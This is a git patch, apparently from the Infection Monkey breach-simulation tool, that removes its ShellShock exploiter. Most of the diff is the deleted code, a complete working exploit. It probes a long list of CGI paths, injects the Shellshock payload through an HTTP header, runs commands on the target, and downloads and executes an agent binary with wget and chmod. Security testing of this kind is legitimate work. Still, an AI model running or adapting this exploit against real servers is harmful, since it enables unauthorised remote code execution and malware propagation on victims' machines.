From 64b900b94d22e275df5cdec8ad3ec0904e44b343 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Feb 2022 13:26:25 +0100
Subject: [PATCH] Agent: Remove ShellShock exploiter
---
 monkey/infection_monkey/example.conf | 1 -
 monkey/infection_monkey/exploit/shellshock.py | 269 ------------
 .../exploit/shellshock_resources.py | 408 ------------------
 3 files changed, 678 deletions(-)
 delete mode 100644 monkey/infection_monkey/exploit/shellshock.py
 delete mode 100644 monkey/infection_monkey/exploit/shellshock_resources.py
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index a0bf5f414..efb9a4350 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -27,7 +27,6 @@
 "SSHExploiter",
 "SmbExploiter",
 "WmiExploiter",
- "ShellShockExploiter",
 "ElasticGroovyExploiter",
 "Struts2Exploiter",
 "WebLogicExploiter",
diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py
deleted file mode 100644
index f76739e1d..000000000
--- a/monkey/infection_monkey/exploit/shellshock.py
+++ /dev/null
@@ -1,269 +0,0 @@ -# Implementation is based on shellshock script provided -# https://github.com/nccgroup/shocker/blob/master/shocker.py - -import logging -import string -from random import SystemRandom - -import requests - -from common.utils.attack_utils import ScanStatus -from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.shellshock_resources import CGI_FILES -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey -from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import DROPPER_ARG -from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -from infection_monkey.utils.commands import build_monkey_commandline - -logger = logging.getLogger(__name__) -TIMEOUT = 2 -TEST_COMMAND = "/bin/uname -a" -DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder -LOCK_HELPER_FILE = "/tmp/monkey_shellshock" - - -class ShellShockExploiter(HostExploiter): - _attacks = {"Content-type": "() { :;}; echo; "} - - _TARGET_OS_TYPE = ["linux"] - _EXPLOITED_SERVICE = "Bash" - - def __init__(self, host): - super(ShellShockExploiter, self).__init__(host) - self.HTTP = [str(port) for port in self._config.HTTP_PORTS] - safe_random = SystemRandom() - self.success_flag = "".join( - safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20) - ) - - def _exploit_host(self): - # start by picking ports - candidate_services = { - service: self.host.services[service] - for service in self.host.services - if ("name" in self.host.services[service]) - and (self.host.services[service]["name"] == "http") - } - - valid_ports = [ - (port, candidate_services["tcp-" + str(port)]["data"][1]) - for port in self.HTTP - if "tcp-" + str(port) in candidate_services - ] - http_ports = [port[0] for port in valid_ports if not port[1]] - https_ports = [port[0] for port in valid_ports if port[1]] - - logger.info( - "Scanning %s, ports [%s] for vulnerable CGI pages" - % (self.host, 
",".join([str(port[0]) for port in valid_ports])) - ) - - attackable_urls = [] - # now for each port we want to check the entire URL list - for port in http_ports: - urls = self.check_urls(self.host.ip_addr, port) - attackable_urls.extend(urls) - for port in https_ports: - urls = self.check_urls(self.host.ip_addr, port, is_https=True) - attackable_urls.extend(urls) - # now for each URl we want to try and see if it's attackable - exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls] - exploitable_urls = [url for url in exploitable_urls if url[0] is True] - - # we want to report all vulnerable URLs even if we didn't succeed - self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls] - - # now try URLs until we install something on victim - for _, url, header, exploit in exploitable_urls: - logger.info("Trying to attack host %s with %s URL" % (self.host, url)) - # same attack script as sshexec - # for any failure, quit and don't try other URLs - if not self.host.os.get("type"): - try: - uname_os_attack = exploit + "/bin/uname -o" - uname_os = self.attack_page(url, header, uname_os_attack) - if "linux" in uname_os: - self.host.os["type"] = "linux" - else: - logger.info("SSH Skipping unknown os: %s", uname_os) - return False - except Exception as exc: - logger.debug( - "Error running uname os command on victim %r: (%s)", self.host, exc - ) - return False - if not self.host.os.get("machine"): - try: - uname_machine_attack = exploit + "/bin/uname -m" - uname_machine = self.attack_page(url, header, uname_machine_attack) - if "" != uname_machine: - self.host.os["machine"] = uname_machine.lower().strip() - except Exception as exc: - logger.debug( - "Error running uname machine command on victim %r: (%s)", self.host, exc - ) - return False - - # copy the monkey - dropper_target_path_linux = self._config.dropper_target_path_linux - - src_path = get_target_monkey(self.host) - if not src_path: - logger.info("Can't find suitable monkey 
executable for host %r", self.host) - return False - - if not self._create_lock_file(exploit, url, header): - logger.info("Another monkey is running shellshock exploit") - return True - - http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) - - if not http_path: - logger.debug("Exploiter ShellShock failed, http transfer creation failed.") - return False - - download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux) - - download = exploit + download_command - self.attack_page( - url, header, download - ) # we ignore failures here since it might take more than TIMEOUT time - - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - - self._remove_lock_file(exploit, url, header) - - if (http_thread.downloads != 1) or ( - "ELF" - not in self.check_remote_file_exists( - url, header, exploit, dropper_target_path_linux - ) - ): - logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) - continue - - # turn the monkey into an executable - chmod = "/bin/chmod +x %s" % dropper_target_path_linux - run_path = exploit + chmod - self.attack_page(url, header, run_path) - T1222Telem(ScanStatus.USED, chmod, self.host).send() - - # run the monkey - cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) - cmdline += build_monkey_commandline( - self.host, - get_monkey_depth() - 1, - dropper_target_path_linux, - ) - cmdline += " & " - run_path = exploit + cmdline - self.attack_page(url, header, run_path) - - logger.info( - "Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, - self.host, - cmdline, - ) - - if not ( - self.check_remote_file_exists( - url, header, exploit, self._config.monkey_log_path_linux - ) - ): - logger.info("Log file does not exist, monkey might not have run") - continue - self.add_executed_cmd(cmdline) - return True - - return False - - @classmethod - def check_remote_file_exists(cls, url, header, exploit, file_path): - """ - Checks if a 
remote file exists and returns the content if so - file_path should be fully qualified - """ - cmdline = "/usr/bin/head -c 4 %s" % file_path - run_path = exploit + cmdline - resp = cls.attack_page(url, header, run_path) - if resp: - logger.info("File %s exists on remote host" % file_path) - return resp - - def attempt_exploit(self, url, attacks=None): - # Flag used to identify whether the exploit has successfully caused the - # server to return a useful response - - if not attacks: - attacks = self._attacks - - logger.debug("Attack Flag is: %s" % self.success_flag) - - logger.debug("Trying exploit for %s" % url) - for header, exploit in list(attacks.items()): - attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND - result = self.attack_page(url, header, attack) - if self.success_flag in result: - logger.info("URL %s looks vulnerable" % url) - return True, url, header, exploit - else: - logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) - return (False,) - - def _create_lock_file(self, exploit, url, header): - if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE): - return False - cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE - self.attack_page(url, header, cmd) - return True - - def _remove_lock_file(self, exploit, url, header): - cmd = exploit + "rm %s" % LOCK_HELPER_FILE - self.attack_page(url, header, cmd) - - @staticmethod - def attack_page(url, header, attack): - result = "" - try: - logger.debug("Header is: %s" % header) - logger.debug("Attack is: %s" % attack) - r = requests.get( # noqa: DUO123 - url, headers={header: attack}, verify=False, timeout=TIMEOUT - ) - result = r.content.decode() - return result - except requests.exceptions.RequestException as exc: - logger.debug("Failed to run, exception %s" % exc) - return result - - @staticmethod - def check_urls(host, port, is_https=False, url_list=CGI_FILES): - """ - Checks if which urls exist - :return: Sequence of URLs to try and 
attack - """ - attack_path = "http://" - if is_https: - attack_path = "https://" - attack_path = attack_path + str(host) + ":" + str(port) - reqs = [] - timeout = False - attack_urls = [attack_path + url for url in url_list] - for u in attack_urls: - try: - reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123 - except requests.Timeout: - timeout = True - break - if timeout: - logger.debug( - "Some connections timed out while sending request to potentially vulnerable " - "urls." - ) - valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok] - urls = [resp.url for resp in valid_resps] - - return urls diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py deleted file mode 100644 index 3a128b23e..000000000 --- a/monkey/infection_monkey/exploit/shellshock_resources.py +++ /dev/null 
@@ -1,408 +0,0 @@ -# resource for shellshock attack -# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list - -CGI_FILES = ( - r"/", - r"/admin.cgi", - r"/administrator.cgi", - r"/agora.cgi", - r"/aktivate/cgi-bin/catgy.cgi", - r"/analyse.cgi", - r"/apps/web/vs_diag.cgi", - r"/axis-cgi/buffer/command.cgi", - r"/b2-include/b2edit.showposts.php", - r"/bandwidth/index.cgi", - r"/bigconf.cgi", - r"/cartcart.cgi", - r"/cart.cgi", - r"/ccbill/whereami.cgi", - r"/cgi-bin/14all-1.1.cgi", - r"/cgi-bin/14all.cgi", - r"/cgi-bin/a1disp3.cgi", - r"/cgi-bin/a1stats/a1disp3.cgi", - r"/cgi-bin/a1stats/a1disp4.cgi", - r"/cgi-bin/addbanner.cgi", - r"/cgi-bin/add_ftp.cgi", - r"/cgi-bin/adduser.cgi", - r"/cgi-bin/admin/admin.cgi", - r"/cgi-bin/admin.cgi", - r"/cgi-bin/admin/getparam.cgi", - r"/cgi-bin/adminhot.cgi", - r"/cgi-bin/admin.pl", - r"/cgi-bin/admin/setup.cgi", - r"/cgi-bin/adminwww.cgi", - r"/cgi-bin/af.cgi", - r"/cgi-bin/aglimpse.cgi", - r"/cgi-bin/alienform.cgi", - r"/cgi-bin/AnyBoard.cgi", - r"/cgi-bin/architext_query.cgi", - r"/cgi-bin/astrocam.cgi", - r"/cgi-bin/AT-admin.cgi", - r"/cgi-bin/AT-generate.cgi", - r"/cgi-bin/auction/auction.cgi", - r"/cgi-bin/auktion.cgi", - r"/cgi-bin/ax-admin.cgi", - r"/cgi-bin/ax.cgi", - r"/cgi-bin/axs.cgi", - r"/cgi-bin/badmin.cgi", - r"/cgi-bin/banner.cgi", - r"/cgi-bin/bannereditor.cgi", - r"/cgi-bin/bb-ack.sh", - r"/cgi-bin/bb-histlog.sh", - r"/cgi-bin/bb-hist.sh", - r"/cgi-bin/bb-hostsvc.sh", - r"/cgi-bin/bb-replog.sh", - r"/cgi-bin/bb-rep.sh", - r"/cgi-bin/bbs_forum.cgi", - r"/cgi-bin/bigconf.cgi", - r"/cgi-bin/bizdb1-search.cgi", - r"/cgi-bin/blog/mt-check.cgi", - r"/cgi-bin/blog/mt-load.cgi", - r"/cgi-bin/bnbform.cgi", - r"/cgi-bin/book.cgi", - r"/cgi-bin/boozt/admin/index.cgi", - r"/cgi-bin/bsguest.cgi", - r"/cgi-bin/bslist.cgi", - r"/cgi-bin/build.cgi", - r"/cgi-bin/bulk/bulk.cgi", - r"/cgi-bin/cached_feed.cgi", - r"/cgi-bin/cachemgr.cgi", - r"/cgi-bin/calendar/index.cgi", - 
r"/cgi-bin/cartmanager.cgi", - r"/cgi-bin/cbmc/forums.cgi", - r"/cgi-bin/ccvsblame.cgi", - r"/cgi-bin/c_download.cgi", - r"/cgi-bin/cgforum.cgi", - r"/cgi-bin/.cgi", - r"/cgi-bin/cgi_process", - r"/cgi-bin/classified.cgi", - r"/cgi-bin/classifieds.cgi", - r"/cgi-bin/classifieds/classifieds.cgi", - r"/cgi-bin/classifieds/index.cgi", - r"/cgi-bin/.cobalt/alert/service.cgi", - r"/cgi-bin/.cobalt/message/message.cgi", - r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi", - r"/cgi-bin/commandit.cgi", - r"/cgi-bin/commerce.cgi", - r"/cgi-bin/common/listrec.pl", - r"/cgi-bin/compatible.cgi", - r"/cgi-bin/Count.cgi", - r"/cgi-bin/csChatRBox.cgi", - r"/cgi-bin/csGuestBook.cgi", - r"/cgi-bin/csLiveSupport.cgi", - r"/cgi-bin/CSMailto.cgi", - r"/cgi-bin/CSMailto/CSMailto.cgi", - r"/cgi-bin/csNews.cgi", - r"/cgi-bin/csNewsPro.cgi", - r"/cgi-bin/csPassword.cgi", - r"/cgi-bin/csPassword/csPassword.cgi", - r"/cgi-bin/csSearch.cgi", - r"/cgi-bin/csv_db.cgi", - r"/cgi-bin/cvsblame.cgi", - r"/cgi-bin/cvslog.cgi", - r"/cgi-bin/cvsquery.cgi", - r"/cgi-bin/cvsqueryform.cgi", - r"/cgi-bin/day5datacopier.cgi", - r"/cgi-bin/day5datanotifier.cgi", - r"/cgi-bin/db_manager.cgi", - r"/cgi-bin/dbman/db.cgi", - r"/cgi-bin/dcforum.cgi", - r"/cgi-bin/dcshop.cgi", - r"/cgi-bin/dfire.cgi", - r"/cgi-bin/diagnose.cgi", - r"/cgi-bin/dig.cgi", - r"/cgi-bin/directorypro.cgi", - r"/cgi-bin/download.cgi", - r"/cgi-bin/e87_Ba79yo87.cgi", - r"/cgi-bin/emu/html/emumail.cgi", - r"/cgi-bin/emumail.cgi", - r"/cgi-bin/emumail/emumail.cgi", - r"/cgi-bin/enter.cgi", - r"/cgi-bin/environ.cgi", - r"/cgi-bin/ezadmin.cgi", - r"/cgi-bin/ezboard.cgi", - r"/cgi-bin/ezman.cgi", - r"/cgi-bin/ezshopper2/loadpage.cgi", - r"/cgi-bin/ezshopper3/loadpage.cgi", - r"/cgi-bin/ezshopper/loadpage.cgi", - r"/cgi-bin/ezshopper/search.cgi", - r"/cgi-bin/faqmanager.cgi", - r"/cgi-bin/FileSeek2.cgi", - r"/cgi-bin/FileSeek.cgi", - r"/cgi-bin/finger.cgi", - r"/cgi-bin/flexform.cgi", - r"/cgi-bin/fom.cgi", - r"/cgi-bin/fom/fom.cgi", - 
r"/cgi-bin/FormHandler.cgi", - r"/cgi-bin/FormMail.cgi", - r"/cgi-bin/gbadmin.cgi", - r"/cgi-bin/gbook/gbook.cgi", - r"/cgi-bin/generate.cgi", - r"/cgi-bin/getdoc.cgi", - r"/cgi-bin/gH.cgi", - r"/cgi-bin/gm-authors.cgi", - r"/cgi-bin/gm.cgi", - r"/cgi-bin/gm-cplog.cgi", - r"/cgi-bin/guestbook.cgi", - r"/cgi-bin/handler", - r"/cgi-bin/handler.cgi", - r"/cgi-bin/handler/netsonar", - r"/cgi-bin/hitview.cgi", - r"/cgi-bin/hsx.cgi", - r"/cgi-bin/html2chtml.cgi", - r"/cgi-bin/html2wml.cgi", - r"/cgi-bin/htsearch.cgi", - r"/cgi-bin/hw.sh", # testing - r"/cgi-bin/icat", - r"/cgi-bin/if/admin/nph-build.cgi", - r"/cgi-bin/ikonboard/help.cgi", - r"/cgi-bin/ImageFolio/admin/admin.cgi", - r"/cgi-bin/imageFolio.cgi", - r"/cgi-bin/index.cgi", - r"/cgi-bin/infosrch.cgi", - r"/cgi-bin/jammail.pl", - r"/cgi-bin/journal.cgi", - r"/cgi-bin/lastlines.cgi", - r"/cgi-bin/loadpage.cgi", - r"/cgi-bin/login.cgi", - r"/cgi-bin/logit.cgi", - r"/cgi-bin/log-reader.cgi", - r"/cgi-bin/lookwho.cgi", - r"/cgi-bin/lwgate.cgi", - r"/cgi-bin/MachineInfo", - r"/cgi-bin/MachineInfo", - r"/cgi-bin/magiccard.cgi", - r"/cgi-bin/mail/emumail.cgi", - r"/cgi-bin/maillist.cgi", - r"/cgi-bin/mailnews.cgi", - r"/cgi-bin/mail/nph-mr.cgi", - r"/cgi-bin/main.cgi", - r"/cgi-bin/main_menu.pl", - r"/cgi-bin/man.sh", - r"/cgi-bin/mini_logger.cgi", - r"/cgi-bin/mmstdod.cgi", - r"/cgi-bin/moin.cgi", - r"/cgi-bin/mojo/mojo.cgi", - r"/cgi-bin/mrtg.cgi", - r"/cgi-bin/mt.cgi", - r"/cgi-bin/mt/mt.cgi", - r"/cgi-bin/mt/mt-check.cgi", - r"/cgi-bin/mt/mt-load.cgi", - r"/cgi-bin/mt-static/mt-check.cgi", - r"/cgi-bin/mt-static/mt-load.cgi", - r"/cgi-bin/musicqueue.cgi", - r"/cgi-bin/myguestbook.cgi", - r"/cgi-bin/.namazu.cgi", - r"/cgi-bin/nbmember.cgi", - r"/cgi-bin/netauth.cgi", - r"/cgi-bin/netpad.cgi", - r"/cgi-bin/newsdesk.cgi", - r"/cgi-bin/nlog-smb.cgi", - r"/cgi-bin/nph-emumail.cgi", - r"/cgi-bin/nph-exploitscanget.cgi", - r"/cgi-bin/nph-publish.cgi", - r"/cgi-bin/nph-test.cgi", - r"/cgi-bin/pagelog.cgi", - 
r"/cgi-bin/pbcgi.cgi", - r"/cgi-bin/perlshop.cgi", - r"/cgi-bin/pfdispaly.cgi", - r"/cgi-bin/pfdisplay.cgi", - r"/cgi-bin/phf.cgi", - r"/cgi-bin/photo/manage.cgi", - r"/cgi-bin/photo/protected/manage.cgi", - r"/cgi-bin/php-cgi", - r"/cgi-bin/php.cgi", - r"/cgi-bin/php.fcgi", - r"/cgi-bin/ping.sh", - r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi", - r"/cgi-bin/pollssi.cgi", - r"/cgi-bin/postcards.cgi", - r"/cgi-bin/powerup/r.cgi", - r"/cgi-bin/printenv", - r"/cgi-bin/probecontrol.cgi", - r"/cgi-bin/profile.cgi", - r"/cgi-bin/publisher/search.cgi", - r"/cgi-bin/quickstore.cgi", - r"/cgi-bin/quizme.cgi", - r"/cgi-bin/ratlog.cgi", - r"/cgi-bin/r.cgi", - r"/cgi-bin/register.cgi", - r"/cgi-bin/replicator/webpage.cgi/", - r"/cgi-bin/responder.cgi", - r"/cgi-bin/robadmin.cgi", - r"/cgi-bin/robpoll.cgi", - r"/cgi-bin/rtpd.cgi", - r"/cgi-bin/sbcgi/sitebuilder.cgi", - r"/cgi-bin/scoadminreg.cgi", - r"/cgi-bin-sdb/printenv", - r"/cgi-bin/sdbsearch.cgi", - r"/cgi-bin/search", - r"/cgi-bin/search.cgi", - r"/cgi-bin/search/search.cgi", - r"/cgi-bin/sendform.cgi", - r"/cgi-bin/shop.cgi", - r"/cgi-bin/shopper.cgi", - r"/cgi-bin/shopplus.cgi", - r"/cgi-bin/showcheckins.cgi", - r"/cgi-bin/simplestguest.cgi", - r"/cgi-bin/simplestmail.cgi", - r"/cgi-bin/smartsearch.cgi", - r"/cgi-bin/smartsearch/smartsearch.cgi", - r"/cgi-bin/snorkerz.bat", - r"/cgi-bin/snorkerz.bat", - r"/cgi-bin/snorkerz.cmd", - r"/cgi-bin/snorkerz.cmd", - r"/cgi-bin/sojourn.cgi", - r"/cgi-bin/spin_client.cgi", - r"/cgi-bin/start.cgi", - r"/cgi-bin/status", - r"/cgi-bin/status_cgi", - r"/cgi-bin/store/agora.cgi", - r"/cgi-bin/store.cgi", - r"/cgi-bin/store/index.cgi", - r"/cgi-bin/survey.cgi", - r"/cgi-bin/sync.cgi", - r"/cgi-bin/talkback.cgi", - r"/cgi-bin/technote/main.cgi", - r"/cgi-bin/test2.pl", - r"/cgi-bin/test-cgi", - r"/cgi-bin/test.cgi", - r"/cgi-bin/testing_whatever", - r"/cgi-bin/test/test.cgi", - r"/cgi-bin/tidfinder.cgi", - r"/cgi-bin/tigvote.cgi", - r"/cgi-bin/title.cgi", - r"/cgi-bin/top.cgi", - 
r"/cgi-bin/traffic.cgi", - r"/cgi-bin/troops.cgi", - r"/cgi-bin/ttawebtop.cgi/", - r"/cgi-bin/ultraboard.cgi", - r"/cgi-bin/upload.cgi", - r"/cgi-bin/urlcount.cgi", - r"/cgi-bin/viewcvs.cgi", - r"/cgi-bin/view_help.cgi", - r"/cgi-bin/viralator.cgi", - r"/cgi-bin/virgil.cgi", - r"/cgi-bin/vote.cgi", - r"/cgi-bin/vpasswd.cgi", - r"/cgi-bin/way-board.cgi", - r"/cgi-bin/way-board/way-board.cgi", - r"/cgi-bin/webbbs.cgi", - r"/cgi-bin/webcart/webcart.cgi", - r"/cgi-bin/webdist.cgi", - r"/cgi-bin/webif.cgi", - r"/cgi-bin/webmail/html/emumail.cgi", - r"/cgi-bin/webmap.cgi", - r"/cgi-bin/webspirs.cgi", - r"/cgi-bin/Web_Store/web_store.cgi", - r"/cgi-bin/whois.cgi", - r"/cgi-bin/whois_raw.cgi", - r"/cgi-bin/whois/whois.cgi", - r"/cgi-bin/wrap", - r"/cgi-bin/wrap.cgi", - r"/cgi-bin/wwwboard.cgi.cgi", - r"/cgi-bin/YaBB/YaBB.cgi", - r"/cgi-bin/zml.cgi", - r"/cgi-mod/index.cgi", - r"/cgis/wwwboard/wwwboard.cgi", - r"/cgi-sys/addalink.cgi", - r"/cgi-sys/defaultwebpage.cgi", - r"/cgi-sys/domainredirect.cgi", - r"/cgi-sys/entropybanner.cgi", - r"/cgi-sys/entropysearch.cgi", - r"/cgi-sys/FormMail-clone.cgi", - r"/cgi-sys/helpdesk.cgi", - r"/cgi-sys/mchat.cgi", - r"/cgi-sys/randhtml.cgi", - r"/cgi-sys/realhelpdesk.cgi", - r"/cgi-sys/realsignup.cgi", - r"/cgi-sys/signup.cgi", - r"/connector.cgi", - r"/cp/rac/nsManager.cgi", - r"/create_release.sh", - r"/CSNews.cgi", - r"/csPassword.cgi", - r"/dcadmin.cgi", - r"/dcboard.cgi", - r"/dcforum.cgi", - r"/dcforum/dcforum.cgi", - r"/debuff.cgi", - r"/debug.cgi", - r"/details.cgi", - r"/edittag/edittag.cgi", - r"/emumail.cgi", - r"/enter_buff.cgi", - r"/enter_bug.cgi", - r"/ez2000/ezadmin.cgi", - r"/ez2000/ezboard.cgi", - r"/ez2000/ezman.cgi", - r"/fcgi-bin/echo", - r"/fcgi-bin/echo", - r"/fcgi-bin/echo2", - r"/fcgi-bin/echo2", - r"/Gozila.cgi", - r"/hitmatic/analyse.cgi", - r"/hp_docs/cgi-bin/index.cgi", - r"/html/cgi-bin/cgicso", - r"/html/cgi-bin/cgicso", - r"/index.cgi", - r"/info.cgi", - r"/infosrch.cgi", - r"/login.cgi", - 
r"/mailview.cgi", - r"/main.cgi", - r"/megabook/admin.cgi", - r"/ministats/admin.cgi", - r"/mods/apage/apage.cgi", - r"/_mt/mt.cgi", - r"/musicqueue.cgi", - r"/ncbook.cgi", - r"/newpro.cgi", - r"/newsletter.sh", - r"/oem_webstage/cgi-bin/oemapp_cgi", - r"/page.cgi", - r"/parse_xml.cgi", - r"/photodata/manage.cgi", - r"/photo/manage.cgi", - r"/print.cgi", - r"/process_buff.cgi", - r"/process_bug.cgi", - r"/pub/english.cgi", - r"/quikmail/nph-emumail.cgi", - r"/quikstore.cgi", - r"/reviews/newpro.cgi", - r"/ROADS/cgi-bin/search.pl", - r"/sample01.cgi", - r"/sample02.cgi", - r"/sample03.cgi", - r"/sample04.cgi", - r"/sampleposteddata.cgi", - r"/scancfg.cgi", - r"/scancfg.cgi", - r"/servers/link.cgi", - r"/setpasswd.cgi", - r"/SetSecurity.shm", - r"/shop/member_html.cgi", - r"/shop/normal_html.cgi", - r"/site_searcher.cgi", - r"/siteUserMod.cgi", - r"/submit.cgi", - r"/technote/print.cgi", - r"/template.cgi", - r"/test.cgi", - r"/ucsm/isSamInstalled.cgi", - r"/upload.cgi", - r"/userreg.cgi", - r"/users/scripts/submit.cgi", - r"/vood/cgi-bin/vood_view.cgi", - r"/Web_Store/web_store.cgi", - r"/webtools/bonsai/ccvsblame.cgi", - r"/webtools/bonsai/cvsblame.cgi", - r"/webtools/bonsai/cvslog.cgi", - r"/webtools/bonsai/cvsquery.cgi", - r"/webtools/bonsai/cvsqueryform.cgi", - r"/webtools/bonsai/showcheckins.cgi", - r"/wwwadmin.cgi", - r"/wwwboard.cgi", - r"/wwwboard/wwwboard.cgi", -)